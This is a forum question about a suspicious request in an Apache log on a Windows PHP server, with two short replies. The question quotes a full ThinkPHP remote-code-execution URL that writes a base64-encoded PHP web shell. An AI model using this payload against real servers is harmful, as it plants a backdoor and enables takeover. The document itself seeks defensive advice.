# Apache 2.4.51 URL Defence

Tags: php, apache-2.4, logging

I am running Apache 2.4.51 with PHP 8.1.0 on a Windows 10 PC. Recently, I noticed some entries in my log and corresponding alerts from Windows Defender. An example culprit causing an AV alert is `https://jacobsm.com/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));` which gives a 200 code in response, and an alert from Windows Defender of `Backdoor:PHP/Remoteshell.B`. Defender also states that the Status is failed and that it may not have been fully remediated. The file affected is the Apache log file, so it can't quarantine it because it is in use by Apache. I suspect it is worried that the file may be interpreted by the PHP processor (although it never will be). Should I be concerned?

Comment: Yes, you should. Either your Windows PC is exposed directly to the internet, or you have malware roaming in your LAN. Both are issues that should be addressed.

Comment: Okay, I have removed PHP from the stack, and use alternative techniques to obtain what I was getting with PHP. I should be safe now with just Apache 2.4.51 running, surely?!?